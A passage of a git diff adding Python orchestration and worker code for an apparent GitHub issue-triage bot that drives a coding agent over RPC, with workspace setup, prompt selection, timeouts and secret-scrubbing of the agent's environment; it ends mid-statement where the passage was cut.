+ issue_row = db.get_issue(issue_row.key) or issue_row + elif issue_row is not None and issue_row.branch is None and pr_info is not None and pr_info.head_ref: + db.set_issue_branch(issue_row.key, pr_info.head_ref) + issue_row = db.get_issue(issue_row.key) or issue_row + return issue_row, pr_info + + +def _can_handle_pr_directly(*, settings: Settings, repo_full: str, pr: PullRequestInfo) -> bool: + """Only bot-owned same-repo PR branches are safe to amend directly.""" + if not pr.head_ref: + log.info("skip: PR has no head ref", extra={"repo": repo_full, "pr": pr.number}) + return False + if pr.author.lower() != settings.bot_login.lower(): + log.info( + "skip: unmapped PR not authored by bot", + extra={"repo": repo_full, "pr": pr.number, "author": pr.author}, + ) + return False + if pr.head_repo.lower() != repo_full.lower(): + log.info( + "skip: unmapped PR head is not this repo", + extra={"repo": repo_full, "pr": pr.number, "head_repo": pr.head_repo}, + ) + return False + return True + + +async def triage_issue( + *, + settings: Settings, + db: Database, + github: GitHubBackend, + sandbox: SandboxManager, + git_transport: GitTransport, + payload: Mapping[str, Any], + delivery_id: str, + attempts: int = 0, + slot_uid: int | None = None, +) -> None: + repo, issue = await _resolve_repo_and_issue(github, payload) + if issue.is_pull_request: + log.info("skip: triage on PR-like issue", extra={"repo": repo.full_name, "n": issue.number}) + return + key = issue_key(repo.full_name, issue.number) + if db.get_issue(key) is None: + # First-time triage: bail if a PR (human or another bot) already + # claims to close this issue via Closes/Fixes/Resolves syntax or + # the Development panel. We never replay closing-PR detection on + # a follow-up because by then the bot has already committed + # resources (workspace, omp session) to this issue. + try: + closing_prs = await github.list_closing_pull_requests(repo.full_name, issue.number) + except GitHubError as exc: + # Fail-open: a transient timeline fetch failure shouldn't + # block legitimate triage. Worst case we do redundant work. + log.warning( + "closing-PR check failed; proceeding with triage", + extra={"key": key, "err": str(exc)}, + ) + closing_prs = () + if closing_prs: + log.info( + "skip: issue already covered by an open PR", + extra={"key": key, "prs": list(closing_prs)}, + ) + return + db.upsert_issue(key=key, repo=repo.full_name, number=issue.number, state="reproducing") + clone_url = repo.clone_url + workspace = sandbox.ensure_workspace( + repo=repo.full_name, + number=issue.number, + title=issue.title, + clone_url=clone_url, + default_branch=repo.default_branch, + author_name=settings.resolved_author_name, + author_email=settings.git_author_email, + slot_uid=slot_uid, + ) + db.upsert_issue( + key=key, + repo=repo.full_name, + number=issue.number, + state="reproducing", + branch=workspace.branch, + session_dir=str(workspace.session_dir), + ) + inputs = TaskInputs( + settings=settings, + db=db, + github=github, + git_transport=git_transport, + repo=repo, + issue=issue, + workspace=workspace, + delivery_id=delivery_id, + attempts=attempts, + slot_uid=slot_uid, + natives_cache=sandbox.natives_cache, + ) + await run_task(task_kind="triage_issue", inputs=inputs) + + +async def handle_comment( + *, + settings: Settings, + db: Database, + github: GitHubBackend, + sandbox: SandboxManager, + git_transport: GitTransport, + payload: Mapping[str, Any], + delivery_id: str, + attempts: int = 0, + slot_uid: int | None = None, +) -> None: + repo, issue = await _resolve_repo_and_issue(github, payload) + key = issue_key(repo.full_name, issue.number) + existing = db.get_issue(key) + directive = _directive_from_payload(payload) + comment = _comment_from_payload(payload) + clone_url = repo.clone_url + + if existing is None: + if directive is None: + log.info("skip: comment on unknown issue", extra={"key": key}) + return + # Maintainer summon on an untriaged issue: bootstrap a row + workspace, + # then route through triage-with-directive so the agent classifies + # first and executes the directive in the same RPC turn. + log.info("directive bootstrap", extra={"key": key, "author": directive.author}) + db.upsert_issue(key=key, repo=repo.full_name, number=issue.number, state="reproducing") + workspace = sandbox.ensure_workspace( + repo=repo.full_name, + number=issue.number, + title=issue.title, + clone_url=clone_url, + default_branch=repo.default_branch, + author_name=settings.resolved_author_name, + author_email=settings.git_author_email, + slot_uid=slot_uid, + ) + db.upsert_issue( + key=key, + repo=repo.full_name, + number=issue.number, + state="reproducing", + branch=workspace.branch, + session_dir=str(workspace.session_dir), + ) + inputs = TaskInputs( + settings=settings, + db=db, + github=github, + git_transport=git_transport, + repo=repo, + issue=issue, + workspace=workspace, + delivery_id=delivery_id, + attempts=attempts, + slot_uid=slot_uid, + natives_cache=sandbox.natives_cache, + ) + directive = await _attach_thread(github, directive, repo.full_name, issue.number, is_pr=False) + await run_task(task_kind="triage_issue", inputs=inputs, directive=directive) + return + + if existing.state in ("merged", "closed", "abandoned"): + if directive is None: + log.info("skip: comment on finalized issue", extra={"key": key, "state": existing.state}) + try: + await github.post_comment( + repo.full_name, + issue.number, + persona.finalized_issue_comment(), + ) + except GitHubError as exc: + log.warning("ack comment failed", extra={"err": str(exc)}) + return + # Maintainer reopen: tear down stale workspace, reset state, branch + # afresh from default. The old branch may have been merged/deleted. + log.info("directive reopen", extra={"key": key, "from_state": existing.state, "author": directive.author}) + sandbox.remove_workspace(repo=repo.full_name, number=issue.number) + db.upsert_issue(key=key, repo=repo.full_name, number=issue.number, state="reproducing") + workspace = sandbox.ensure_workspace( + repo=repo.full_name, + number=issue.number, + title=issue.title, + clone_url=clone_url, + default_branch=repo.default_branch, + author_name=settings.resolved_author_name, + author_email=settings.git_author_email, + slot_uid=slot_uid, + ) + db.upsert_issue( + key=key, + repo=repo.full_name, + number=issue.number, + state="reproducing", + branch=workspace.branch, + session_dir=str(workspace.session_dir), + ) + inputs = TaskInputs( + settings=settings, + db=db, + github=github, + git_transport=git_transport, + repo=repo, + issue=issue, + workspace=workspace, + delivery_id=delivery_id, + attempts=attempts, + slot_uid=slot_uid, + natives_cache=sandbox.natives_cache, + ) + directive = await _attach_thread(github, directive, repo.full_name, issue.number, is_pr=False) + await run_task(task_kind="handle_comment", inputs=inputs, comment=comment, directive=directive) + return + + workspace = sandbox.ensure_workspace( + repo=repo.full_name, + number=issue.number, + title=issue.title, + clone_url=clone_url, + default_branch=repo.default_branch, + existing_branch=existing.branch, + author_name=settings.resolved_author_name, + author_email=settings.git_author_email, + slot_uid=slot_uid, + ) + inputs = TaskInputs( + settings=settings, + db=db, + github=github, + git_transport=git_transport, + repo=repo, + issue=issue, + workspace=workspace, + delivery_id=delivery_id, + attempts=attempts, + slot_uid=slot_uid, + natives_cache=sandbox.natives_cache, + ) + directive = await _attach_thread(github, directive, repo.full_name, issue.number, is_pr=False) + await run_task(task_kind="handle_comment", inputs=inputs, comment=comment, directive=directive) + + +async def handle_review( + *, + settings: Settings, + db: Database, + github: GitHubBackend, + sandbox: SandboxManager, + git_transport: GitTransport, + payload: Mapping[str, Any], + delivery_id: str, + attempts: int = 0, + slot_uid: int | None = None, +) -> None: + pr = payload.get("pull_request") or {} + pr_number = int(pr.get("number") or 0) + if pr_number <= 0: + log.info("skip: review without PR number") + return + repo_payload = payload.get("repository") or {} + repo_full = str(repo_payload.get("full_name") or "") + if not repo_full: + log.info("skip: review without repo") + return + issue_row, pr_info = await _resolve_issue_row_for_pr( + db=db, + github=github, + repo_full=repo_full, + pr_number=pr_number, + ) + if issue_row is None: + if pr_info is None or not _can_handle_pr_directly(settings=settings, repo_full=repo_full, pr=pr_info): + return + issue_number = pr_number + existing_branch = pr_info.head_ref + else: + if issue_row.branch is None: + log.info("skip: review PR missing branch mapping", extra={"repo": repo_full, "pr": pr_number}) + return + issue_number = issue_row.number + existing_branch = issue_row.branch + try: + repo = await github.get_repo(repo_full) + issue = await github.get_issue(repo_full, issue_number) + except GitHubError as exc: + log.warning("review fetch failed", extra={"err": str(exc)}) + return + clone_url = repo.clone_url + workspace = sandbox.ensure_workspace( + repo=repo.full_name, + number=issue.number, + title=issue.title, + clone_url=clone_url, + default_branch=repo.default_branch, + existing_branch=existing_branch, + author_name=settings.resolved_author_name, + author_email=settings.git_author_email, + slot_uid=slot_uid, + ) + if issue_row is None: + db.upsert_issue( + key=issue_key(repo_full, pr_number), + repo=repo_full, + number=pr_number, + state="opened", + branch=workspace.branch, + session_dir=str(workspace.session_dir), + pr_number=pr_number, + ) + comment = payload.get("comment") or {} + user = comment.get("user") or {} + review_payload = { + "author": str(user.get("login") or ""), + "body": str(comment.get("body") or ""), + "path": str(comment.get("path") or ""), + "line": comment.get("line"), + "start_line": comment.get("start_line"), + "original_line": comment.get("original_line"), + } + inputs = TaskInputs( + settings=settings, + db=db, + github=github, + git_transport=git_transport, + repo=repo, + issue=issue, + workspace=workspace, + delivery_id=delivery_id, + attempts=attempts, + slot_uid=slot_uid, + natives_cache=sandbox.natives_cache, + ) + await run_task( + task_kind="handle_review", + inputs=inputs, + pr_number=pr_number, + review_payload=review_payload, + ) + + +async def handle_pr_conversation( + *, + settings: Settings, + db: Database, + github: GitHubBackend, + sandbox: SandboxManager, + git_transport: GitTransport, + payload: Mapping[str, Any], + delivery_id: str, + attempts: int = 0, + slot_uid: int | None = None, +) -> None: + """Handle a regular (non-review) comment on a bot-authored PR. + + The `issue_comment.created` payload's `issue.number` IS the PR number on + these events; we resolve back to the originating issue via the DB and + drive `handle_comment` so the agent works on the same session/branch. + """ + repo_payload = payload.get("repository") or {} + repo_full = str(repo_payload.get("full_name") or "") + issue_payload = payload.get("issue") or {} + pr_number = issue_payload.get("number") + if not repo_full or not isinstance(pr_number, int): + log.info("skip: pr-conversation missing repo/number") + return + issue_row, pr_info = await _resolve_issue_row_for_pr( + db=db, + github=github, + repo_full=repo_full, + pr_number=pr_number, + ) + if issue_row is None: + if pr_info is None or not _can_handle_pr_directly(settings=settings, repo_full=repo_full, pr=pr_info): + return + directive = _directive_from_payload(payload) + if issue_row is not None and issue_row.state in ("merged", "closed", "abandoned"): + if directive is None: + log.info("skip: pr-conversation on finalized issue", extra={"key": issue_row.key, "state": issue_row.state}) + # Still acknowledge so the reporter knows the bot saw it. + try: + await github.post_comment( + repo_full, + pr_number, + persona.finalized_pr_comment(), + ) + except GitHubError as exc: + log.warning("ack comment failed", extra={"err": str(exc)}) + return + # Maintainer reopen on a finalized PR: tear down stale workspace and + # branch afresh on the originating issue. The agent will open a new + # PR if code changes ship. + log.info( + "directive reopen (pr)", + extra={"key": issue_row.key, "from_state": issue_row.state, "author": directive.author}, + ) + sandbox.remove_workspace(repo=issue_row.repo, number=issue_row.number) + db.upsert_issue(key=issue_row.key, repo=issue_row.repo, number=issue_row.number, state="reproducing") + issue_row = db.get_issue(issue_row.key) or issue_row + # Bare @mention with no request body — the route stashes an empty + # _robomp_directive; _directive_from_payload rejects it but the key + # being present tells us a mention happened. Reply cheaply without omp. + if directive is None and payload.get("_robomp_directive") is not None: + comment = _comment_from_payload(payload) + log.info( + "bare mention, prompting for request", extra={"repo": repo_full, "pr": pr_number, "author": comment.author} + ) + try: + await github.post_comment(repo_full, pr_number, persona.bare_mention_reply()) + except GitHubError as exc: + log.warning("bare mention reply failed", extra={"err": str(exc)}) + return + issue_number = issue_row.number if issue_row is not None else pr_number + try: + repo = await github.get_repo(repo_full) + issue = await github.get_issue(repo_full, issue_number) + except GitHubError as exc: + log.warning("pr-conversation fetch failed", extra={"err": str(exc)}) + return + clone_url = repo.clone_url + if issue_row is None: + assert pr_info is not None + existing_branch = pr_info.head_ref + else: + # On a reopen the prior branch is stale (merged/deleted), so branch from + # default; otherwise reuse the existing branch. + existing_branch = ( + None if directive and issue_row.state == "reproducing" and issue_row.branch is None else issue_row.branch + ) + if existing_branch is None and not (directive and issue_row.state == "reproducing"): + log.info("skip: pr-conversation PR missing branch mapping", extra={"repo": repo_full, "pr": pr_number}) + return + workspace = sandbox.ensure_workspace( + repo=repo.full_name, + number=issue.number, + title=issue.title, + clone_url=clone_url, + default_branch=repo.default_branch, + existing_branch=existing_branch, + author_name=settings.resolved_author_name, + author_email=settings.git_author_email, + slot_uid=slot_uid, + ) + if issue_row is None: + db.upsert_issue( + key=issue_key(repo_full, pr_number), + repo=repo_full, + number=pr_number, + state="opened", + branch=workspace.branch, + session_dir=str(workspace.session_dir), + pr_number=pr_number, + ) + elif directive is not None and (issue_row.branch is None or issue_row.branch != workspace.branch): + db.upsert_issue( + key=issue_row.key, + repo=issue_row.repo, + number=issue_row.number, + state="reproducing", + branch=workspace.branch, + session_dir=str(workspace.session_dir), + ) + comment = _comment_from_payload(payload) + inputs = TaskInputs( + settings=settings, + db=db, + github=github, + git_transport=git_transport, + repo=repo, + issue=issue, + workspace=workspace, + delivery_id=delivery_id, + attempts=attempts, + slot_uid=slot_uid, + natives_cache=sandbox.natives_cache, + ) + directive = await _attach_thread(github, directive, repo_full, pr_number, is_pr=True) + await run_task(task_kind="handle_comment", inputs=inputs, comment=comment, pr_number=pr_number, directive=directive) + + +async def cleanup_workspace( + *, + settings: Settings, + db: Database, + sandbox: SandboxManager, + payload: Mapping[str, Any], + target_state: IssueState, +) -> None: + """Tear down the workspace for a finished issue/PR.""" + repo_payload = payload.get("repository") or {} + repo_full = str(repo_payload.get("full_name") or "") + if not repo_full: + return + issue_payload = payload.get("issue") or payload.get("pull_request") or {} + number = issue_payload.get("number") + if not isinstance(number, int): + return + # If this is a PR close, map to the originating issue. + issue_row: IssueRow | None + if "pull_request" in payload: + issue_row = db.find_issue_by_pr(repo_full, number) + else: + issue_row = db.get_issue(issue_key(repo_full, number)) + if issue_row is None: + return + sandbox.remove_workspace(repo=issue_row.repo, number=issue_row.number) + db.set_issue_state(issue_row.key, target_state) + log.info("cleanup", extra={"key": issue_row.key, "state": target_state}) + + +__all__ = [ + "cleanup_workspace", + "handle_comment", + "handle_pr_conversation", + "handle_review", + "triage_issue", +] diff --git a/python/robomp/src/worker.py b/python/robomp/src/worker.py new file mode 100644 index 000000000..28973b2b2 --- /dev/null +++ b/python/robomp/src/worker.py @@ -0,0 +1,689 @@ +"""Per-task RpcClient driver. + +The orchestrator calls `run_task(...)` from within an asyncio loop. The +function spins up `RpcClient` on a worker thread, drives the kickoff/follow-up +prompt, and returns when the agent emits `agent_end`. + +Host tools call back into the orchestrator's GitHub client and DB. Because the +RpcClient runs in its own subprocess and the host-tool callbacks are dispatched +on the RpcClient's stdout-reader thread, the callbacks block until coroutines +scheduled onto the parent loop complete (`asyncio.run_coroutine_threadsafe`). +""" + +from __future__ import annotations + +import asyncio +import logging +import os +import shutil +import threading +from dataclasses import dataclass +from pathlib import Path +from typing import Any + +from omp_rpc import ( + MessageUpdateEvent, + RpcClient, + RpcError, + RpcProcessExitError, + ToolExecutionEndEvent, +) + +from robomp import host_tools, persona, pragmas +from robomp.cancellation import register_cancel_hook, unregister_cancel_hook +from robomp.config import Settings +from robomp.db import Database, issue_key +from robomp.github_backend import GitHubBackend +from robomp.github_client import CommentInfo, IssueInfo, RepoInfo +from robomp.host_tools import AbortController, ToolBindings, _git_identity_env +from robomp.natives_cache import NativesCache +from robomp.natives_cache import compute_key as natives_compute_key +from robomp.sandbox import GitTransport, Workspace, _prepare_slot_runtime_env, _safe_directory_env + +log = logging.getLogger(__name__) + + +@dataclass(slots=True) +class TaskInputs: + """Common context shared by every task type.""" + + settings: Settings + db: Database + github: GitHubBackend + git_transport: GitTransport + repo: RepoInfo + issue: IssueInfo + workspace: Workspace + delivery_id: str + attempts: int = 0 + slot_uid: int | None = None + natives_cache: NativesCache | None = None + + +@dataclass(slots=True, frozen=True) +class ThreadMessage: + """One entry in the conversation a directive carries to the agent.""" + + kind: str # issue_body | pr_body | comment | review_comment | review + author: str + body: str + created_at: str + path: str | None = None # review_comment only + line: int | None = None # review_comment only + state: str | None = None # review only (APPROVED / CHANGES_REQUESTED / COMMENTED) + + +@dataclass(slots=True, frozen=True) +class DirectiveInfo: + """A maintainer's `@bot` mention captured as an authoritative instruction. + + `thread` is the full conversation context (issue/PR body + every prior + comment + every review) up to the moment the directive fired. + """ + + body: str + author: str + thread: tuple[ThreadMessage, ...] = () + pragmas: tuple[tuple[str, str], ...] = () + + +def _resolve_pragma_overrides( + directive: DirectiveInfo | None, + settings: Settings, +) -> tuple[str | None, pragmas.ThinkingLevel | None]: + """Return `(model_override, thinking_override)` for the current directive. + + `None` for either means "no override, use the settings default". Aliases + that don't match anything in the pool / level set are dropped (caller logs + the discard at the callsite that has access to issue_key). + """ + if directive is None or not directive.pragmas: + return None, None + model_value = pragmas.pragma_value(directive.pragmas, "model") + thinking_value = pragmas.pragma_value(directive.pragmas, "thinking") + model_override = pragmas.resolve_model_alias(model_value, settings.model_pool) if model_value else None + thinking_override = pragmas.resolve_thinking_level(thinking_value) if thinking_value else None + return model_override, thinking_override + + +_SCRUBBED_ENV_KEYS: tuple[str, ...] = ( + # Secrets that MUST NOT reach the agent subprocess; an agent with the + # `bash` tool could otherwise `printenv` them out of roboomp's env. + "GITHUB_TOKEN", + "GITHUB_WEBHOOK_SECRET", + "ROBOMP_REPLAY_TOKEN", + "ROBOMP_GH_PROXY_HMAC_KEY", +) + +_AGENT_HOME = Path("/srv/agent-home") +_AGENT_HOME_STAGE = Path("/srv/agent-home-stage") + + +def _stage_agent_home() -> None: + """Copy late-appearing staged agent config into the runtime HOME.""" + if not _AGENT_HOME_STAGE.exists(): + return + + for rel in (Path(".agent"), Path(".omp/agent")): + src = _AGENT_HOME_STAGE / rel + if not src.exists(): + continue + + dst = _AGENT_HOME / rel + try: + if os.path.lexists(dst): + if dst.is_dir() and not dst.is_symlink(): + shutil.rmtree(dst) + else: + dst.unlink() + dst.parent.mkdir(parents=True, exist_ok=True) + shutil.copytree(src, dst, dirs_exist_ok=True) + except OSError as exc: + log.warning("Failed to stage agent home path %s: %s", rel, exc) + + if not _AGENT_HOME.exists(): + return + + chown_to_root = os.geteuid() == 0 + for root, dirs, files in os.walk(_AGENT_HOME): + root_path = Path(root) + try: + root_path.chmod(0o755) + if chown_to_root: + os.chown(root_path, 0, 0) + except OSError as exc: + log.warning("Failed to normalize agent home directory %s: %s", root_path, exc) + + for name in dirs: + path = root_path / name + try: + path.chmod(0o755) + if chown_to_root: + os.chown(path, 0, 0) + except OSError as exc: + log.warning("Failed to normalize agent home directory %s: %s", path, exc) + + for name in files: + path = root_path / name + try: + path.chmod(0o644) + if chown_to_root: + os.chown(path, 0, 0) + except OSError as exc: + log.warning("Failed to normalize agent home file %s: %s", path, exc) + + +def _build_extra_env(settings: Settings) -> dict[str, str]: + """Build the env overlay passed to the omp subprocess. + + `omp_rpc` merges this dict on top of `os.environ`, so overlaying empty + strings for the sensitive keys is what actually masks them in the + child — `del` on the parent's env would not help us here. + """ + del settings # kept for future hooks (model-specific env, etc.) + _stage_agent_home() + env = dict.fromkeys(_SCRUBBED_ENV_KEYS, "") + if _AGENT_HOME.is_dir(): + env["HOME"] = str(_AGENT_HOME) + return env + + +_TERMINAL_TRIAGE_TOOLS: frozenset[str] = frozenset({"gh_open_pr", "mark_unable_to_reproduce", "abort_task"}) +_PR_REQUIRING_CLASSIFICATIONS: frozenset[str] = frozenset({"bug", "documentation"}) + + +def _needs_completion_reminder( + *, + task_kind: str, + inputs: TaskInputs, + bindings: ToolBindings, + tools_called: set[str], +) -> bool: + """True iff a `triage_issue` turn ended before reaching a terminal tool. + + Only enforced for `bug` / `documentation` classifications — `question`, + `enhancement`, `proposal`, `invalid`, `duplicate` terminate on a single + `gh_post_comment` which we can't reliably distinguish from a preamble. + """ + if task_kind != "triage_issue": + return False + if bindings.abort is not None and bindings.abort.triggered: + return False + row = inputs.db.get_issue(bindings.issue_key) + if row is None or row.classification not in _PR_REQUIRING_CLASSIFICATIONS: + return False + return not (tools_called & _TERMINAL_TRIAGE_TOOLS) + + +def _drive_turn( + client: RpcClient, + initial_prompt: str, + *, + task_kind: str, + inputs: TaskInputs, + bindings: ToolBindings, + tools_called: set[str], +) -> Any: + """Run the initial prompt and, if the agent stopped early, send reminders. + + Returns the final `Turn` (last `prompt_and_wait` result), or `None` when + the agent intentionally pulled the plug via `abort_task`. + """ + settings = inputs.settings + max_reminders = settings.task_completion_max_reminders + + def _run(prompt: str) -> Any: + try: + return client.prompt_and_wait(prompt, timeout=settings.task_timeout_seconds) + except (RpcError, RpcProcessExitError): + # Did the agent intentionally pull the plug via `abort_task`? + # If so, swallow — the abort path is a clean exit, not a + # failure that should surface in the dashboard or trigger + # a comment to the reporter. Anything else propagates. + if bindings.abort is not None and bindings.abort.triggered: + log.info( + "rpc_aborted_by_tool", + extra={"issue": bindings.issue_key, "task": task_kind, "reason": bindings.abort.reason}, + ) + return None + raise + + turn = _run(initial_prompt) + if turn is None: + return None + + reminders_used = 0 + while reminders_used < max_reminders and _needs_completion_reminder( + task_kind=task_kind, inputs=inputs, bindings=bindings, tools_called=tools_called + ): + reminders_used += 1 + log.warning( + "rpc_completion_reminder", + extra={ + "issue": bindings.issue_key, + "task": task_kind, + "attempt": reminders_used, + "max": max_reminders, + }, + ) + reminder = persona.completion_reminder(repo=inputs.repo, issue=inputs.issue, workspace=inputs.workspace) + next_turn = _run(reminder) + if next_turn is None: + return None + turn = next_turn + + if reminders_used and _needs_completion_reminder( + task_kind=task_kind, inputs=inputs, bindings=bindings, tools_called=tools_called + ): + log.warning( + "rpc_completion_unfinished", + extra={ + "issue": bindings.issue_key, + "task": task_kind, + "reminders": reminders_used, + "tools_called": sorted(tools_called), + }, + ) + return turn + + +def _has_prior_session(session_dir: Path) -> bool: + """Return True iff `session_dir` already contains an omp JSONL transcript. + + pi's `coding-agent` writes one `*.jsonl` per session into `--session-dir`. + The presence of any such file is the signal that `--continue` will pick + up the most recent transcript (`SessionManager.continueRecent`) rather + than starting fresh. + """ + try: + return any(session_dir.glob("*.jsonl")) + except OSError: + return False + + +def _build_prompt( + task_kind: str, + inputs: TaskInputs, + *, + comment: CommentInfo | None, + pr_number: int | None, + review_payload: dict[str, Any] | None, + directive: DirectiveInfo | None = None, + resuming: bool = False, +) -> str: + if task_kind == "triage_issue": + if resuming: + return persona.resume_triage(repo=inputs.repo, issue=inputs.issue, workspace=inputs.workspace) + if directive is not None: + return persona.kickoff_directive( + repo=inputs.repo, + issue=inputs.issue, + workspace=inputs.workspace, + directive=directive, + ) + return persona.kickoff(repo=inputs.repo, issue=inputs.issue, workspace=inputs.workspace) + if task_kind == "handle_comment": + assert comment is not None + issue_row = inputs.db.get_issue(issue_key(inputs.repo.full_name, inputs.issue.number)) + if issue_row is None: + pr_status = "no PR opened yet" + elif issue_row.pr_number is None: + pr_status = "no PR opened yet" + elif issue_row.state == "merged": + pr_status = f"PR #{issue_row.pr_number} was merged" + elif issue_row.state in ("closed", "abandoned"): + pr_status = f"PR #{issue_row.pr_number} was closed without merge" + else: + pr_status = f"PR #{issue_row.pr_number} is open" + if directive is not None: + return persona.directive( + repo=inputs.repo, + issue=inputs.issue, + workspace=inputs.workspace, + comment=comment, + directive=directive, + pr_status=pr_status, + pr_number=pr_number, + ) + return persona.followup_comment( + repo=inputs.repo, + issue=inputs.issue, + workspace=inputs.workspace, + comment=comment, + pr_status=pr_status, + pr_number=pr_number, + ) + if task_kind == "handle_review": + assert review_payload is not None + path = str(review_payload.get("path") or "") + start = review_payload.get("start_line") or review_payload.get("line") + end = review_payload.get("line") or review_payload.get("original_line") + if isinstance(start, int) and isinstance(end, int) and start != end: + line_range = f":L{start}-L{end}" + elif isinstance(end, int): + line_range = f":L{end}" + else: + line_range = "" + body = str(review_payload.get("body") or "") + author = str(review_payload.get("author") or "") + return persona.followup_review( + repo=inputs.repo, + workspace=inputs.workspace, + pr_number=int(pr_number or 0), + comment_author=author, + comment_body=body, + comment_path=path, + comment_line_range=line_range, + ) + raise ValueError(f"unknown task kind: {task_kind!r}") + + +def _run_rpc_blocking( + inputs: TaskInputs, + *, + task_kind: str, + prompt: str, + loop: asyncio.AbstractEventLoop, + bindings: ToolBindings, + directive: DirectiveInfo | None = None, +) -> str | None: + """Run a full RPC turn synchronously. Returns final assistant text (or None).""" + settings = inputs.settings + + tools_called: set[str] = set() + + def _on_tool_end(event: ToolExecutionEndEvent) -> None: + tool_name = event.tool_name + if event.result is not None: + tools_called.add(tool_name) + log.info( + "tool_end", + extra={ + "issue": bindings.issue_key, + "tool": tool_name, + "ok": event.result is not None, + }, + ) + + def _on_msg(event: MessageUpdateEvent) -> None: + ev = event.assistant_message_event + if isinstance(ev, dict) and ev.get("type") == "text_delta": + log.debug("delta", extra={"issue": bindings.issue_key, "delta": str(ev.get("delta", ""))[:200]}) + + rpc_env = _build_extra_env(settings) + rpc_env.update(_prepare_slot_runtime_env(inputs.workspace, inputs.slot_uid)) + rpc_env.update(_safe_directory_env(bindings.workspace.repo_dir)) + rpc_env.update(_git_identity_env(inputs.settings.resolved_author_name, inputs.settings.git_author_email)) + resuming = _has_prior_session(bindings.workspace.session_dir) + extra_args: tuple[str, ...] = ("--continue",) if resuming else () + log.info( + "rpc_resume", + extra={ + "issue": bindings.issue_key, + "task": task_kind, + "resuming": resuming, + "session_dir": str(bindings.workspace.session_dir), + "attempts": inputs.attempts, + }, + ) + model_override, thinking_override = _resolve_pragma_overrides(directive, settings) + chosen_model = model_override or settings.pick_model() + chosen_thinking = thinking_override or settings.thinking_level + log.info( + "rpc_model_pick", + extra={ + "issue": bindings.issue_key, + "model": chosen_model, + "pool": list(settings.model_pool), + "thinking": chosen_thinking, + "pragma_model": model_override, + "pragma_thinking": thinking_override, + }, + ) + inputs.db.set_event_model(inputs.delivery_id, chosen_model) + + with RpcClient( + executable=settings.omp_command, + cwd=bindings.workspace.repo_dir, + session_dir=bindings.workspace.session_dir, + env=rpc_env, + no_session=False, + no_title=True, + model=chosen_model, + provider=settings.provider, + thinking=chosen_thinking if chosen_thinking != "off" else None, + append_system_prompt=persona.system_append(repo=inputs.repo, issue=inputs.issue, workspace=inputs.workspace), + custom_tools=host_tools.build(bindings), + request_timeout=settings.request_timeout_seconds, + startup_timeout=60.0, + max_event_history=50_000, + extra_args=extra_args, + user=inputs.slot_uid, + group=inputs.slot_uid if inputs.slot_uid is not None else None, + extra_groups=["omp"] if inputs.slot_uid is not None else None, + ) as client: + # Arm cancellation: from this point the API can kill the omp subprocess + # out from under us, which makes `prompt_and_wait` raise an `RpcError` + # we'll let propagate. The `with` exit calls `client.stop()` again, but + # it's idempotent. + # + # NOTE: omp_rpc.RpcClient.stop() has a bug where it sets `_stopping=True` + # before the stdout reader loop notices the closed pipe, so the reader's + # `if not self._stopping` guard skips `_mark_closed()` entirely. + # `_wait_for_agent_end` then blocks on `_event_condition` until the hard + # timeout because `_closed_error` is never set. We work around it here + # by calling `_mark_closed()` ourselves after stop returns — this is + # idempotent (it no-ops when `_closed_error` is already set). + def _cancel_hook() -> None: + try: + client.stop() + finally: + # Private API, but the only way to unblock `_wait_for_agent_end` + # without waiting for the request timeout. Idempotent. + client._mark_closed( # noqa: SLF001 + RpcProcessExitError("cancelled by operator") + ) + + if bindings.abort is not None: + bindings.abort.stop = _cancel_hook + register_cancel_hook(_cancel_hook) + try: + client.install_headless_ui() + client.on_tool_execution_end(_on_tool_end) + client.on_message_update(_on_msg) + + phases = persona.seed_phases(task_kind) + if phases: + try: + if task_kind == "triage_issue" and not resuming: + # Fresh triage: seed the full plan. + client.set_todos(phases) + elif task_kind == "triage_issue": + # Resumed triage: prior phases are intact in the + # JSONL transcript — re-seeding would clobber any + # in-progress task statuses. Trust the loaded state. + log.info( + "set_todos skipped (resume)", + extra={"issue": bindings.issue_key, "task": task_kind}, + ) + else: + # Follow-up: keep prior phases (e.g. Reproduce / Fix / PR) + # so the agent still sees the context, but append the + # follow-up phase at the end. + existing = list(client.get_todos()) + merged = [ + { + "id": p.id, + "name": p.name, + "tasks": [ + { + "id": t.id, + "content": t.content, + "status": t.status, + "notes": t.notes, + "details": t.details, + } + for t in p.tasks + ], + } + for p in existing + ] + phases + client.set_todos(merged) + except RpcError as exc: + log.warning("set_todos failed", extra={"err": str(exc)}) + + log.info( + "rpc_start", + extra={"issue": bindings.issue_key, "task": task_kind, "branch": bindings.workspace.branch}, + ) + hard_timeout_seconds = settings.task_timeout_seconds + settings.task_timeout_hard_grace_seconds + hard_timeout_fired = threading.Event() + + def _hard_stop() -> None: + hard_timeout_fired.set() + log.warning( + "rpc_hard_timeout", + extra={"issue": bindings.issue_key, "task": task_kind, "timeout": hard_timeout_seconds}, + ) + try: + _cancel_hook() + except Exception: + log.exception( + "rpc hard timeout stop failed", extra={"issue": bindings.issue_key, "task": task_kind} + ) + + hard_timer = threading.Timer(hard_timeout_seconds, _hard_stop) + hard_timer.daemon = True + hard_timer.start() + try: + turn = _drive_turn( + client, + prompt, + task_kind=task_kind, + inputs=inputs, + bindings=bindings, + tools_called=tools_called, + ) + if turn is None: + return None + finally: + hard_timer.cancel() + if hard_timeout_fired.is_set(): + raise TimeoutError("omp task exceeded hard timeout") + log.info( + "rpc_done", + extra={ + "issue": bindings.issue_key, + "task": task_kind, + "messages": len(turn.messages), + "events": len(turn.events), + }, + ) + return turn.assistant_text + finally: + unregister_cancel_hook() + + +async def run_task( + *, + task_kind: str, + inputs: TaskInputs, + comment: CommentInfo | None = None, + pr_number: int | None = None, + review_payload: dict[str, Any] | None = None, + directive: DirectiveInfo | None = None, +) -> str | None: + """Async wrapper that runs the synchronous RPC driver on a worker thread.""" + loop = asyncio.get_running_loop() + bindings = ToolBindings( + db=inputs.db, + github=inputs.github, + git_transport=inputs.git_transport, + repo=inputs.repo, + issue=inputs.issue, + workspace=inputs.workspace, + loop=loop, + settings=inputs.settings, + author_name=inputs.settings.resolved_author_name, + author_email=inputs.settings.git_author_email, + inbound_thread_number=pr_number, + inbound_is_pr=pr_number is not None, + slot_uid=inputs.slot_uid, + abort=AbortController(), + ) + resuming = _has_prior_session(inputs.workspace.session_dir) + prompt = _build_prompt( + task_kind, + inputs, + comment=comment, + pr_number=pr_number, + review_payload=review_payload, + directive=directive, + resuming=resuming, + ) + try: + result = await asyncio.to_thread( + _run_rpc_blocking, + inputs, + task_kind=task_kind, + prompt=prompt, + loop=loop, + bindings=bindings, + directive=directive, + ) + except BaseException: + # Failed/aborted task: NEVER capture, the artifacts may be inconsistent + # with the source state and would poison the cache. + raise + else: + await 